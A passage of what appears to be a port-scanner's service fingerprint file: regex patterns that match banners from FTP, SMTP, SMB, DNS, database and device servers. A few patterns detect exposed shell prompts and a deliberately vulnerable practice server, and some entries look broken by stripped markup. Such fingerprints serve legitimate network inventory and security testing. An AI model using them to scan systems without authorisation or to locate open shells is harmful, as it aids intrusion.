The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server 